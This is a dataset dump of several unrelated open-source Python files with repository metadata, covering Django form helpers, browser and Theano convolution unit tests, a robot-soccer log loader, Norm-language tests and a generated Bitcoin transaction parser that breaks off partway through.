87133f6cea1799e0b5e073dbc727dc88746f8fa8
|
[
"BSD-3-Clause"
] | 1
|
2020-01-17T16:26:54.000Z
|
2020-01-17T16:26:54.000Z
|
"""Denmark specific Form helpers."""
| 33.259259
| 94
| 0.759465
|
"""Denmark specific Form helpers."""
from django.core.exceptions import ValidationError
from django.forms import fields, widgets
from django.utils.translation import gettext_lazy as _
from .dk_municipalities import DK_MUNICIPALITIES
from .dk_postalcodes import DK_POSTALCODES
def postal_code_validator(value):
if value not in [entry[0] for entry in DK_POSTALCODES]:
raise ValidationError(_('Enter a postal code in the format XXXX.'))
class DKPostalCodeField(fields.CharField):
"""An Input widget that uses a list of Danish postal codes as valid input."""
default_validators = [postal_code_validator]
class DKMunicipalitySelect(widgets.Select):
"""A Select widget that uses a list of Danish municipalities (kommuner) as its choices."""
def __init__(self, attrs=None, *args, **kwargs):
super().__init__(attrs, choices=DK_MUNICIPALITIES, *args, **kwargs)
| 0
| 0
| 0
| 400
| 0
| 148
| 0
| 129
| 181
|
b8de9676b1c3db948ce6ca35eb77076d04fa3617
| 3,445
|
py
|
Python
|
test/unit/test_browser.py
|
sanAkdam/chime
|
1adbddbdddcdc2669086dee60d1bfb2f97535cff
|
[
"BSD-3-Clause"
] | 8
|
2015-02-05T22:12:41.000Z
|
2015-05-15T16:15:14.000Z
|
test/unit/test_browser.py
|
sanAkdam/chime
|
1adbddbdddcdc2669086dee60d1bfb2f97535cff
|
[
"BSD-3-Clause"
] | 168
|
2015-02-02T23:02:52.000Z
|
2015-05-15T21:54:07.000Z
|
test/unit/test_browser.py
|
codeforamerica/bizarro-cms
|
1adbddbdddcdc2669086dee60d1bfb2f97535cff
|
[
"BSD-3-Clause"
] | 5
|
2016-11-20T15:51:32.000Z
|
2021-04-16T09:44:08.000Z
|
import unittest
if __name__ == '__main__':
unittest.main()
| 37.043011
| 116
| 0.613933
|
import unittest
from unittest import TestCase
from acceptance.browser import Browser
class TestBrowser(TestCase):
def test_creation(self):
browser = Browser('Windows', '7', "IE", '8.0')
self.assertEqual('Windows', browser.os)
self.assertEqual('7', browser.os_version)
self.assertEqual('IE', browser.browser)
self.assertEqual('8.0', browser.browser_version)
def test_as_selenium_capabilities(self):
browser = Browser('Windows', '7', "IE", '8.0')
self.assertEqual(
{'os': 'Windows', 'os_version': '7',
'browser': 'IE', 'browser_version': '8.0'},
browser.as_browserstack_capabilities())
def test_as_browserstack_capabilities_with_extra_info(self):
browser = Browser('Windows', '7', "IE", '8.0')
self.assertEqual(
{'os': 'Windows', 'os_version': '7',
'browser': 'IE', 'browser_version': '8.0'},
browser.as_browserstack_capabilities())
def test_as_saucelabs_capabilities(self):
browser = Browser('Windows', '7', "IE", '8.0')
self.assertEqual(
{'platform': 'Windows 7',
'browserName': 'internet explorer', 'version': '8.0', 'foo': 'bar'},
browser.as_saucelabs_capabilities({'foo': 'bar'}))
def test_doesnt_mutate_extra_info(self):
browser = Browser('Windows', '7', "IE", '8.0')
other_info = {'foo': 'bar'}
self.assertEqual(
{'os': 'Windows', 'os_version': '7',
'browser': 'IE', 'browser_version': '8.0', 'foo': 'bar'},
browser.as_browserstack_capabilities(other_info))
self.assertEqual(1, len(other_info.keys()))
def test_from_string_basic(self):
browsers = Browser.from_string("all")
self.assertEqual(9, len(browsers))
browsers = Browser.from_string(None)
self.assertEqual(None, browsers)
browsers = Browser.from_string("")
self.assertEqual(None, browsers)
def test_from_string_unknown(self):
with self.assertRaises(ValueError):
Browser.from_string("arglebargle")
def test_from_string_supported(self):
browsers = Browser.from_string("supported")
self.assertEqual(8, len(browsers))
self.assertFalse(Browser('Windows', '8.1', "IE", '11.0') in browsers)
def test_from_string_with_browser(self):
browsers = Browser.from_string("ie8")
self.assertEqual([Browser('Windows', '7', "IE", '8.0')], browsers)
browsers = Browser.from_string("ie11")
self.assertEqual([Browser('Windows', '8.1', "IE", '11.0'), Browser('Windows', '7', "IE", '11.0')], browsers)
def test_from_string_with_os(self):
browsers = Browser.from_string("win8.1")
for browser in browsers:
self.assertEqual('Windows', browser.os)
self.assertEqual('8.1', browser.os_version)
def test_from_string_with_os_and_browser(self):
browsers = Browser.from_string("win8.1/ie11")
self.assertEqual([Browser('Windows', '8.1', "IE", '11.0')], browsers)
def test_safe_name(self):
browser = Browser('Windows', '7', "IE", '8.0')
self.assertEqual("windows_7_ie_8_0", browser.safe_name())
def test_as_string(self):
browser = Browser('Windows', '7', 'IE', '8.0')
self.assertEqual('Windows 7 IE 8.0', str(browser))
if __name__ == '__main__':
unittest.main()
| 0
| 0
| 0
| 3,286
| 0
| 0
| 0
| 25
| 68
|
23198638402b93bfa4324851435640a23d8cb61f
| 4,889
|
py
|
Python
|
logplayer/r2files.py
|
rug/robosoc2d
|
7a018f8ef6974f96a44df018b8adb185e2c07c63
|
[
"MIT"
] | null | null | null |
logplayer/r2files.py
|
rug/robosoc2d
|
7a018f8ef6974f96a44df018b8adb185e2c07c63
|
[
"MIT"
] | null | null | null |
logplayer/r2files.py
|
rug/robosoc2d
|
7a018f8ef6974f96a44df018b8adb185e2c07c63
|
[
"MIT"
] | null | null | null |
# (c) 2021 Ruggero Rossi
# Load a Robosoc2d game state log
# supported version: 1.0.0
| 36.214815
| 77
| 0.55676
|
# (c) 2021 Ruggero Rossi
# Load a Robosoc2d game state log
# supported version: 1.0.0
def load_state_log(file_name):
history = None
with open(file_name, 'r') as f:
game={}
version=f.readline()
if len(version)==0 :
return None
game['ver']=version
game['team1_name']=f.readline().strip()
if len(game['team1_name']) == 0:
game['team1_name'] = "Team A"
game['team2_name']=f.readline().strip()
if len(game['team2_name']) == 0:
game['team2_name'] = "Team B"
players=f.readline()
if len(players)==0 :
return None
players= players.split(',')
if len(players)<2:
return None
game['n_players']=[]
if players[0].isdigit():
game['n_players'].append(int(players[0]))
else:
return None
players[1]=players[1].strip('\n')
if players[1].isdigit():
game['n_players'].append(int(players[1]))
else:
return None
settings=f.readline()
if len(settings)==0 :
return None
settings=settings.split(',')
if len(settings) < 34 :
return None
sett={}
sett['ticks_per_time']=int(settings[0])
sett['pitch_length']=float(settings[1])
sett['pitch_width']=float(settings[2])
sett['goal_width']=float(settings[3])
sett['center_radius']=float(settings[4])
sett['pole_radius']=float(settings[5])
sett['ball_radius']=float(settings[6])
sett['player_radius']=float(settings[7])
sett['catch_radius']=float(settings[8])
sett['catch_holding_ticks']=int(settings[9])
sett['kick_radius']=float(settings[10])
sett['kickable_distance']=float(settings[11])
sett['catchable_distance']=float(settings[12])
sett['kickable_angle']=float(settings[13])
sett['kickable_direction_angle']=float(settings[14])
sett['catchable_angle']=float(settings[15])
sett['net_length']=float(settings[16])
sett['catchable_area_length']=float(settings[17])
sett['catchable_area_width']=float(settings[18])
sett['corner_min_distance']=float(settings[19])
sett['throwin_min_distance']=float(settings[20])
sett['out_pitch_limit']=float(settings[21])
sett['max_dash_power']=float(settings[22])
sett['max_kick_power']=float(settings[23])
sett['player_velocity_decay']=float(settings[24])
sett['ball_velocity_decay']=float(settings[25])
sett['max_player_speed']=float(settings[26])
sett['max_ball_speed']=float(settings[27])
sett['catch_probability']=float(settings[28])
sett['player_random_noise']=float(settings[29])
sett['player_direction_noise']=float(settings[30])
sett['player_velocity_direction_mix']=float(settings[31])
sett['ball_inside_player_velocity_displace']=float(settings[32])
sett['after_catch_distance']=float(settings[33].strip('\n'))
game['sett']=sett
ticks=[]
min_line_len=offset=8+game['n_players'][0]*5+game['n_players'][1]*5+4
default_empty=[0]*min_line_len
prev_tick=default_empty
for tick in f:
tick=tick.split(',')
if len(tick) < min_line_len:
print("* error: missing data at tick: "+str(len(ticks)))
tick=prev_tick
t={}
t['score1']=int(tick[1])
t['score2']=int(tick[2])
t['state']=int(tick[3])
t['ball_x']=float(tick[4])
t['ball_y']=float(tick[5])
t['ball_velocity_x']=float(tick[6])
t['ball_velocity_y']=float(tick[7])
t['teams']=[[],[]]
offset=game['n_players'][0]*5
for which_team in range(2):
for i in range(game['n_players'][which_team]):
p={}
p['x']=float(tick[i*5+8+offset*which_team])
p['y']=float(tick[i*5+9+offset*which_team])
p['velocity_x']=float(tick[i*5+10+offset*which_team])
p['velocity_y']=float(tick[i*5+11+offset*which_team])
p['direction']=float(tick[i*5+12+offset*which_team])
t['teams'][which_team].append(p)
offset=(game['n_players'][0]+game['n_players'][1])*5
t['last_touched_team2']=bool(int(tick[8+offset]))
t['starting_team_max_range']=float(tick[9+offset])
t['ball_catched']=int(tick[10+offset])
t['ball_catched_team2']=bool(int(tick[11+offset].strip('\n')))
ticks.append(t)
prev_tick=tick
game['ticks']=ticks
history=game
return history
| 0
| 0
| 0
| 0
| 0
| 4,781
| 0
| 0
| 23
|
6d78cbb20f53042b0737e27a57734137bf0a0e4c
| 8,198
|
py
|
Python
|
theano/sandbox/mkl/tests/test_conv.py
|
intel/Theano-dev
|
6ca6fd4646f9e958058c7bce52cd51923c05c2f4
|
[
"BSD-3-Clause"
] | 64
|
2016-10-02T20:41:56.000Z
|
2020-03-11T14:59:40.000Z
|
theano/sandbox/mkl/tests/test_conv.py
|
intel/Theano-dev
|
6ca6fd4646f9e958058c7bce52cd51923c05c2f4
|
[
"BSD-3-Clause"
] | 4
|
2017-06-12T05:12:38.000Z
|
2018-03-15T03:16:30.000Z
|
theano/sandbox/mkl/tests/test_conv.py
|
intel/Theano-dev
|
6ca6fd4646f9e958058c7bce52cd51923c05c2f4
|
[
"BSD-3-Clause"
] | 30
|
2016-10-27T21:59:00.000Z
|
2021-02-20T09:55:14.000Z
|
import theano
import unittest
import numpy
from nose.plugins.skip import SkipTest
from theano.sandbox import mkl
numpy.random.seed(123)
if not mkl.mkl_available:
raise SkipTest('Optional package MKL disabled')
if theano.config.mode == 'FAST_COMPILE':
mode_with_mkl = theano.compile.mode.get_mode('FAST_RUN').including('mkl')
mode_without_mkl = theano.compile.mode.get_mode('FAST_RUN').excluding('mkl')
else:
mode_with_mkl = theano.compile.mode.get_default_mode().including('mkl')
mode_without_mkl = theano.compile.mode.get_default_mode().excluding('mkl')
if __name__ == '__main__':
unittest.main()
| 44.797814
| 123
| 0.639302
|
import theano
import unittest
import numpy
from nose.plugins.skip import SkipTest
from theano import tensor as T
from theano.tensor.nnet import conv2d
from theano.sandbox import mkl
from theano.sandbox.mkl.basic_ops import U2IConv, I2U
from theano.sandbox.mkl.mkl_conv import Conv2D
numpy.random.seed(123)
if not mkl.mkl_available:
raise SkipTest('Optional package MKL disabled')
if theano.config.mode == 'FAST_COMPILE':
mode_with_mkl = theano.compile.mode.get_mode('FAST_RUN').including('mkl')
mode_without_mkl = theano.compile.mode.get_mode('FAST_RUN').excluding('mkl')
else:
mode_with_mkl = theano.compile.mode.get_default_mode().including('mkl')
mode_without_mkl = theano.compile.mode.get_default_mode().excluding('mkl')
class test_mkl_conv_forward(unittest.TestCase):
def test_conv_U2I(self):
images = T.dtensor4('inputs')
a_internal = U2IConv(imshp=(12, 3, 256, 256),
kshp=(12, 3, 3, 3))(images)
out = I2U()(a_internal)
fopt = theano.function([images], out, mode=mode_with_mkl)
ival = numpy.random.rand(12, 3, 256, 256).astype(numpy.float64)
assert numpy.allclose(fopt(ival), ival)
def test_conv_no_bias(self):
images = T.dtensor4('inputs')
weights = T.dtensor4('weights')
images_internal = U2IConv(imshp=(12, 3, 256, 256), kshp=(12, 3, 3, 3))(images)
convOut_internal = Conv2D(imshp=(12, 3, 256, 256), kshp=(12, 3, 3, 3), filter_flip=False)(images_internal, weights)
convOut_user = I2U()(convOut_internal)
ival = numpy.random.rand(12, 3, 256, 256).astype(numpy.float64)
wval = numpy.random.rand(12, 3, 3, 3).astype(numpy.float64)
fopt = theano.function(inputs=[images, weights], outputs=convOut_user, mode=mode_with_mkl)
new_out = fopt(ival, wval)
convOut = conv2d(images, weights, input_shape=(12, 3, 256, 256), filter_shape=(12, 3, 3, 3), filter_flip=False)
fori = theano.function(inputs=[images, weights], outputs=convOut, mode=mode_without_mkl)
old_out = fori(ival, wval)
assert str(fopt.maker.fgraph.toposort()) != str(fori.maker.fgraph.toposort())
assert numpy.allclose(old_out, new_out)
def test_conv_with_bias(self):
images = T.dtensor4('inputs')
weights = T.dtensor4('weights')
bias = T.dvector('bias')
ishape = [(8, 3, 256, 256), (16, 3, 256, 256), (32, 3, 256, 256), (64, 3, 256, 256)]
wshape = [(8, 3, 3, 3), (16, 3, 3, 3), (32, 3, 3, 3), (64, 3, 3, 3)]
for i, ish in enumerate(ishape):
wsh = wshape[i]
images_internal = U2IConv(imshp=ish, kshp=wsh)(images)
convOutBias_internal = Conv2D(imshp=ish, kshp=wsh, filter_flip=False)(images_internal, weights, bias)
convOutBias_user = I2U()(convOutBias_internal)
ival = numpy.random.rand(*ish).astype(numpy.float64)
wval = numpy.random.rand(*wsh).astype(numpy.float64)
bval = numpy.random.rand(wsh[0]).astype(numpy.float64)
fopt = theano.function(inputs=[images, weights, bias], outputs=convOutBias_user, mode=mode_with_mkl)
new_old = fopt(ival, wval, bval)
convOut = conv2d(images, weights, input_shape=ish, filter_shape=wsh, filter_flip=False)
convOutBias = convOut + bias.dimshuffle('x', 0, 'x', 'x')
fori = theano.function(inputs=[images, weights, bias], outputs=convOutBias, mode=mode_without_mkl)
old_out = fori(ival, wval, bval)
assert str(fopt.maker.fgraph.toposort()) != str(fori.maker.fgraph.toposort())
assert numpy.allclose(old_out, new_old)
def test_no_shape(self):
images = T.dtensor4('inputs')
weights = T.dtensor4('weights')
convOut = conv2d(images, weights, filter_shape=(12, 3, 3, 3), filter_flip=False)
fopt = theano.function(inputs=[images, weights], outputs=convOut, mode=mode_with_mkl)
fori = theano.function(inputs=[images, weights], outputs=convOut, mode=mode_without_mkl)
# No optimization for the case image shape is None
assert all([not isinstance(n, (Conv2D, U2IConv, I2U)) for n in fopt.maker.fgraph.toposort()])
assert str(fopt.maker.fgraph.toposort()) == str(fori.maker.fgraph.toposort())
class test_mkl_conv_backward(unittest.TestCase):
def test_conv_no_bias(self):
images = T.dtensor4('input_conv')
weights = T.dtensor4('weights')
images_internal = U2IConv(imshp=(12, 3, 256, 256), kshp=(12, 3, 3, 3))(images)
convOut = Conv2D(imshp=(12, 3, 256, 256), kshp=(12, 3, 3, 3), filter_flip=False)(images_internal, weights)
convOut_user = I2U()(convOut)
convOutLoss = T.mean(convOut_user)
conv_op_di = T.grad(convOutLoss, images)
conv_op_dk = T.grad(convOutLoss, weights)
convOutBack = [conv_op_di, conv_op_dk]
ival = numpy.random.rand(12, 3, 256, 256).astype(numpy.float64)
wval = numpy.random.rand(12, 3, 3, 3).astype(numpy.float64)
fopt = theano.function(inputs=[images, weights], outputs=convOutBack, mode=mode_with_mkl)
new_out = fopt(ival, wval)
convOut = conv2d(images, weights, input_shape=(12, 3, 256, 256), filter_shape=(12, 3, 3, 3), filter_flip=False)
convOutLoss = T.mean(convOut)
conv_op_di = T.grad(convOutLoss, images)
conv_op_dk = T.grad(convOutLoss, weights)
convOutBack = [conv_op_di, conv_op_dk]
fori = theano.function(inputs=[images, weights], outputs=convOutBack, mode=mode_without_mkl)
old_out = fori(ival, wval)
assert len(fopt.maker.fgraph.toposort()) != len(fori.maker.fgraph.toposort())
assert numpy.allclose(old_out[0], new_out[0])
assert new_out[0].dtype == 'float64'
# weightsGrad Layout is different.
# assert numpy.allclose(old_out[1], new_out[1])
def test_conv_with_bias(self):
images = T.dtensor4('input_conv')
weights = T.dtensor4('weights')
bias = T.dvector('bias')
ishape = [(8, 3, 256, 256), (16, 3, 256, 256), (32, 3, 256, 256), (64, 3, 256, 256)]
wshape = [(8, 3, 3, 3), (16, 3, 3, 3), (32, 3, 3, 3), (64, 3, 3, 3)]
for i, ish in enumerate(ishape):
wsh = wshape[i]
images_internal = U2IConv(imshp=ish, kshp=wsh)(images)
convOut = Conv2D(imshp=ish, kshp=wsh, filter_flip=False)(images_internal, weights, bias)
convOut_user = I2U()(convOut)
convOutLoss = T.mean(convOut_user)
conv_op_di = theano.grad(convOutLoss, images)
conv_op_dk = theano.grad(convOutLoss, weights)
conv_op_db = theano.grad(convOutLoss, bias)
convOutBack = [conv_op_di, conv_op_dk, conv_op_db]
ival = numpy.random.rand(*ish).astype(numpy.float64)
wval = numpy.random.rand(*wsh).astype(numpy.float64)
bval = numpy.random.rand(wsh[0]).astype(numpy.float64) - numpy.random.rand(wsh[0]).astype(numpy.float64)
fopt = theano.function(inputs=[images, weights, bias], outputs=convOutBack, mode=mode_with_mkl)
new_out = fopt(ival, wval, bval)
convOut = conv2d(images, weights, input_shape=ish, filter_shape=wsh, filter_flip=False)
convOutLoss = T.mean(convOut + bias.dimshuffle('x', 0, 'x', 'x'))
conv_op_di = theano.grad(convOutLoss, images)
conv_op_dk = theano.grad(convOutLoss, weights)
conv_op_db = theano.grad(convOutLoss, bias)
convOutBack = [conv_op_di, conv_op_dk, conv_op_db]
fori = theano.function(inputs=[images, weights, bias], outputs=convOutBack, mode=mode_without_mkl)
old_out = fori(ival, wval, bval)
assert len(fopt.maker.fgraph.toposort()) != len(fori.maker.fgraph.toposort())
assert numpy.allclose(old_out[0], new_out[0])
# assert numpy.allclose(old_out[1], new_out[1])
assert numpy.allclose(old_out[2], new_out[2])
assert new_out[0].dtype == 'float64'
assert new_out[2].dtype == 'float64'
if __name__ == '__main__':
unittest.main()
| 0
| 0
| 0
| 7,353
| 0
| 0
| 0
| 82
| 134
|
0a99668876349e7b2f9a56a2f17351b4ba01af2a
| 3,837
|
py
|
Python
|
tests/python_tests.py
|
reasoned-ai/norm
|
5e45d5917ce8745c9a757a0c6b5e689ea0cac19f
|
[
"Apache-2.0"
] | 8
|
2019-07-22T08:57:20.000Z
|
2021-03-26T13:51:02.000Z
|
tests/python_tests.py
|
xumiao/norm
|
5e45d5917ce8745c9a757a0c6b5e689ea0cac19f
|
[
"Apache-2.0"
] | null | null | null |
tests/python_tests.py
|
xumiao/norm
|
5e45d5917ce8745c9a757a0c6b5e689ea0cac19f
|
[
"Apache-2.0"
] | 1
|
2019-11-16T13:37:35.000Z
|
2019-11-16T13:37:35.000Z
|
"""Unit tests for embedding Python code"""
| 30.696
| 70
| 0.484754
|
"""Unit tests for embedding Python code"""
import datetime
from pandas import DataFrame
from tests.utils import NormTestCase
class PythonTestCase(NormTestCase):
def test_python_declaration(self):
script = """
test := {{
from datetime import datetime
test = datetime.utcnow
}};
"""
self.execute(script)
lam = self.execute("test;")
self.assertTrue(lam is not None)
def test_python_query(self):
script = """
test := {{
from datetime import datetime
test = datetime.utcnow
}};
"""
self.execute(script)
result = self.execute("test();")
self.assertTrue(result is not None)
self.assertTrue(isinstance(result, datetime.datetime))
def test_python_query_on_data(self):
script = """
test := {{
import numpy as np
test = np.sin
}};
"""
self.execute(script)
script = """
a := (1, 2, 3)
| (1.1, 2.2, 3.3)
| (0.1, 0.2, 0.3)
;
"""
self.execute(script)
result = self.execute("test(a());")
self.assertTrue(result is not None)
def test_python_custom_function(self):
script = """
test := {{
def test(x):
return '{}-{}'.format(x.b, x.c)
}};
"""
self.execute(script)
script = """
a(b:String, c:String) := ("store", "truth")
| ("having", "evil")
;
"""
self.execute(script)
result = self.execute("test(a());")
self.assertTrue(result is not None)
self.assertTrue(isinstance(result, DataFrame))
def test_python_function_projection(self):
script = """
utcnow := {{
from datetime import datetime
utcnow = datetime.utcnow
}};
"""
self.execute(script)
script = """
a(b:String, c:String) := ("store", "truth")
| ("having", "evil")
;
"""
self.execute(script)
lam = self.execute("a &= utcnow()?time;")
self.assertTrue(lam is not None)
self.assertTrue(isinstance(lam.data, DataFrame))
self.assertTrue(lam.data['time'] is not None)
def test_python_function_projection2(self):
script = """
gaussian := {{
import numpy as np
def gaussian(v):
return np.exp(-v*v / 2)/np.sqrt(2*np.pi)
}};
"""
self.execute(script)
script = """
a(v: Float, mu: Float) := (1.2, 2.3)
| (1.0, 2.0)
;
"""
self.execute(script)
lam = self.execute("a &= gaussian(v)?p;")
self.assertTrue(lam is not None)
self.assertTrue(isinstance(lam.data, DataFrame))
self.assertTrue(lam.data['p'] is not None)
def test_python_code_expression(self):
self.execute("test(a: String, b: Integer);")
import pandas as pd
t1 = pd.DataFrame(data={'a': ['a', 'b', 'c'], 'b': [1, 2, 3]})
self.executor.python_context = locals()
lam = self.execute("test(a: String, b: Integer) := {{ t1 }};")
self.assertTrue(lam is not None)
self.assertTrue(all(lam.data['a'] == ['a', 'b', 'c']))
self.assertTrue(all(lam.data['b'] == [1, 2, 3]))
t2 = t1
t2.loc[1, 'a'] = 'e'
self.executor.python_context = locals()
lam = self.execute("test := {{ t2 }};")
self.assertTrue(lam is not None)
self.assertTrue(all(lam.data['a'] == ['a', 'e', 'c']))
self.assertTrue(all(lam.data['b'] == [1, 2, 3]))
| 0
| 0
| 0
| 3,686
| 0
| 0
| 0
| 16
| 91
|
0a67f4076fdfe5bc717c7292a9258ff71ce35595
| 10,696
|
py
|
Python
|
src/hobbits-plugins/analyzers/KaitaiStruct/ksy_py/network/bitcoin_transaction.py
|
SabheeR/hobbits
|
8bfb997940c73467af2ceb0275c470b763d2c1bf
|
[
"MIT"
] | 304
|
2020-02-07T21:05:22.000Z
|
2022-03-24T05:30:37.000Z
|
src/hobbits-plugins/analyzers/KaitaiStruct/ksy_py/network/bitcoin_transaction.py
|
SabheeR/hobbits
|
8bfb997940c73467af2ceb0275c470b763d2c1bf
|
[
"MIT"
] | 2,107
|
2019-11-05T09:26:16.000Z
|
2022-02-14T13:35:36.000Z
|
src/hobbits-plugins/analyzers/KaitaiStruct/ksy_py/network/bitcoin_transaction.py
|
SabheeR/hobbits
|
8bfb997940c73467af2ceb0275c470b763d2c1bf
|
[
"MIT"
] | 30
|
2020-03-11T14:36:43.000Z
|
2022-03-07T04:45:17.000Z
|
# This is a generated file! Please edit source .ksy file and use kaitai-struct-compiler to rebuild
from pkg_resources import parse_version
import kaitaistruct
if parse_version(kaitaistruct.__version__) < parse_version('0.9'):
raise Exception("Incompatible Kaitai Struct Python API: 0.9 or later is required, but you have %s" % (kaitaistruct.__version__))
| 50.691943
| 164
| 0.553291
|
# This is a generated file! Please edit source .ksy file and use kaitai-struct-compiler to rebuild
from pkg_resources import parse_version
import kaitaistruct
from kaitaistruct import KaitaiStruct, KaitaiStream, BytesIO
import collections
from enum import Enum
if parse_version(kaitaistruct.__version__) < parse_version('0.9'):
raise Exception("Incompatible Kaitai Struct Python API: 0.9 or later is required, but you have %s" % (kaitaistruct.__version__))
class BitcoinTransaction(KaitaiStruct):
"""
.. seealso::
Source - https://bitcoin.org/en/developer-guide#transactions
https://en.bitcoin.it/wiki/Transaction
"""
SEQ_FIELDS = ["version", "num_vins", "vins", "num_vouts", "vouts", "locktime"]
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._debug = collections.defaultdict(dict)
def _read(self):
self._debug['version']['start'] = self._io.pos()
self.version = self._io.read_u4le()
self._debug['version']['end'] = self._io.pos()
self._debug['num_vins']['start'] = self._io.pos()
self.num_vins = self._io.read_u1()
self._debug['num_vins']['end'] = self._io.pos()
self._debug['vins']['start'] = self._io.pos()
self.vins = [None] * (self.num_vins)
for i in range(self.num_vins):
if not 'arr' in self._debug['vins']:
self._debug['vins']['arr'] = []
self._debug['vins']['arr'].append({'start': self._io.pos()})
_t_vins = BitcoinTransaction.Vin(self._io, self, self._root)
_t_vins._read()
self.vins[i] = _t_vins
self._debug['vins']['arr'][i]['end'] = self._io.pos()
self._debug['vins']['end'] = self._io.pos()
self._debug['num_vouts']['start'] = self._io.pos()
self.num_vouts = self._io.read_u1()
self._debug['num_vouts']['end'] = self._io.pos()
self._debug['vouts']['start'] = self._io.pos()
self.vouts = [None] * (self.num_vouts)
for i in range(self.num_vouts):
if not 'arr' in self._debug['vouts']:
self._debug['vouts']['arr'] = []
self._debug['vouts']['arr'].append({'start': self._io.pos()})
_t_vouts = BitcoinTransaction.Vout(self._io, self, self._root)
_t_vouts._read()
self.vouts[i] = _t_vouts
self._debug['vouts']['arr'][i]['end'] = self._io.pos()
self._debug['vouts']['end'] = self._io.pos()
self._debug['locktime']['start'] = self._io.pos()
self.locktime = self._io.read_u4le()
self._debug['locktime']['end'] = self._io.pos()
class Vin(KaitaiStruct):
SEQ_FIELDS = ["txid", "output_id", "len_script", "script_sig", "end_of_vin"]
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._debug = collections.defaultdict(dict)
def _read(self):
self._debug['txid']['start'] = self._io.pos()
self.txid = self._io.read_bytes(32)
self._debug['txid']['end'] = self._io.pos()
self._debug['output_id']['start'] = self._io.pos()
self.output_id = self._io.read_u4le()
self._debug['output_id']['end'] = self._io.pos()
self._debug['len_script']['start'] = self._io.pos()
self.len_script = self._io.read_u1()
self._debug['len_script']['end'] = self._io.pos()
self._debug['script_sig']['start'] = self._io.pos()
self._raw_script_sig = self._io.read_bytes(self.len_script)
_io__raw_script_sig = KaitaiStream(BytesIO(self._raw_script_sig))
self.script_sig = BitcoinTransaction.Vin.ScriptSignature(_io__raw_script_sig, self, self._root)
self.script_sig._read()
self._debug['script_sig']['end'] = self._io.pos()
self._debug['end_of_vin']['start'] = self._io.pos()
self.end_of_vin = self._io.read_bytes(4)
self._debug['end_of_vin']['end'] = self._io.pos()
if not self.end_of_vin == b"\xFF\xFF\xFF\xFF":
raise kaitaistruct.ValidationNotEqualError(b"\xFF\xFF\xFF\xFF", self.end_of_vin, self._io, u"/types/vin/seq/4")
class ScriptSignature(KaitaiStruct):
class SighashType(Enum):
sighash_all = 1
sighash_none = 2
sighash_single = 3
sighash_anyonecanpay = 80
SEQ_FIELDS = ["len_sig_stack", "der_sig", "sig_type", "len_pubkey_stack", "pubkey"]
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._debug = collections.defaultdict(dict)
def _read(self):
self._debug['len_sig_stack']['start'] = self._io.pos()
self.len_sig_stack = self._io.read_u1()
self._debug['len_sig_stack']['end'] = self._io.pos()
self._debug['der_sig']['start'] = self._io.pos()
self.der_sig = BitcoinTransaction.Vin.ScriptSignature.DerSignature(self._io, self, self._root)
self.der_sig._read()
self._debug['der_sig']['end'] = self._io.pos()
self._debug['sig_type']['start'] = self._io.pos()
self.sig_type = KaitaiStream.resolve_enum(BitcoinTransaction.Vin.ScriptSignature.SighashType, self._io.read_u1())
self._debug['sig_type']['end'] = self._io.pos()
self._debug['len_pubkey_stack']['start'] = self._io.pos()
self.len_pubkey_stack = self._io.read_u1()
self._debug['len_pubkey_stack']['end'] = self._io.pos()
self._debug['pubkey']['start'] = self._io.pos()
self.pubkey = BitcoinTransaction.Vin.ScriptSignature.PublicKey(self._io, self, self._root)
self.pubkey._read()
self._debug['pubkey']['end'] = self._io.pos()
class DerSignature(KaitaiStruct):
SEQ_FIELDS = ["sequence", "len_sig", "sep_1", "len_sig_r", "sig_r", "sep_2", "len_sig_s", "sig_s"]
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._debug = collections.defaultdict(dict)
def _read(self):
self._debug['sequence']['start'] = self._io.pos()
self.sequence = self._io.read_bytes(1)
self._debug['sequence']['end'] = self._io.pos()
if not self.sequence == b"\x30":
raise kaitaistruct.ValidationNotEqualError(b"\x30", self.sequence, self._io, u"/types/vin/types/script_signature/types/der_signature/seq/0")
self._debug['len_sig']['start'] = self._io.pos()
self.len_sig = self._io.read_u1()
self._debug['len_sig']['end'] = self._io.pos()
self._debug['sep_1']['start'] = self._io.pos()
self.sep_1 = self._io.read_bytes(1)
self._debug['sep_1']['end'] = self._io.pos()
if not self.sep_1 == b"\x02":
raise kaitaistruct.ValidationNotEqualError(b"\x02", self.sep_1, self._io, u"/types/vin/types/script_signature/types/der_signature/seq/2")
self._debug['len_sig_r']['start'] = self._io.pos()
self.len_sig_r = self._io.read_u1()
self._debug['len_sig_r']['end'] = self._io.pos()
self._debug['sig_r']['start'] = self._io.pos()
self.sig_r = self._io.read_bytes(self.len_sig_r)
self._debug['sig_r']['end'] = self._io.pos()
self._debug['sep_2']['start'] = self._io.pos()
self.sep_2 = self._io.read_bytes(1)
self._debug['sep_2']['end'] = self._io.pos()
if not self.sep_2 == b"\x02":
raise kaitaistruct.ValidationNotEqualError(b"\x02", self.sep_2, self._io, u"/types/vin/types/script_signature/types/der_signature/seq/5")
self._debug['len_sig_s']['start'] = self._io.pos()
self.len_sig_s = self._io.read_u1()
self._debug['len_sig_s']['end'] = self._io.pos()
self._debug['sig_s']['start'] = self._io.pos()
self.sig_s = self._io.read_bytes(self.len_sig_s)
self._debug['sig_s']['end'] = self._io.pos()
class PublicKey(KaitaiStruct):
SEQ_FIELDS = ["type", "x", "y"]
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._debug = collections.defaultdict(dict)
def _read(self):
self._debug['type']['start'] = self._io.pos()
self.type = self._io.read_u1()
self._debug['type']['end'] = self._io.pos()
self._debug['x']['start'] = self._io.pos()
self.x = self._io.read_bytes(32)
self._debug['x']['end'] = self._io.pos()
self._debug['y']['start'] = self._io.pos()
self.y = self._io.read_bytes(32)
self._debug['y']['end'] = self._io.pos()
class Vout(KaitaiStruct):
SEQ_FIELDS = ["amount", "len_script", "script_pub_key"]
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._debug = collections.defaultdict(dict)
def _read(self):
self._debug['amount']['start'] = self._io.pos()
self.amount = self._io.read_u8le()
self._debug['amount']['end'] = self._io.pos()
self._debug['len_script']['start'] = self._io.pos()
self.len_script = self._io.read_u1()
self._debug['len_script']['end'] = self._io.pos()
